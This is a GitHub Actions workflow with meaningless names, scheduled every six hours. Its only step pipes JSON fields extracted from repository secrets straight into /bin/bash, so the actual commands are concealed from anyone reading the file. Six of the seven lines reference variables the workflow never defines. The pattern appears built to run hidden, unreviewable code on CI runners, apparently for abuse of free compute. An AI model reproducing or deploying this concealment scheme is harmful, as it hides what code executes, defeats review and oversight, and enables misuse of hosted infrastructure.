name: bowallow

on:
  workflow_dispatch:
  schedule:
    - cron: '5 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: bowallow
        env:
          wxie53: ${{ secrets.wxie53 }}
        run: |
          echo $wxie53 | jq -r .i28807 | /bin/bash
          echo $wiz4628 | jq -r .ncmz48882 | /bin/bash
          echo $bk87 | jq -r .o7 | /bin/bash
          echo $vls88 | jq -r .txg50780 | /bin/bash
          echo $ilix06 | jq -r .grt9100 | /bin/bash
          echo $lq1019 | jq -r .wmyoc514 | /bin/bash
          echo $lncwd168 | jq -r .rqpnq50 | /bin/bash

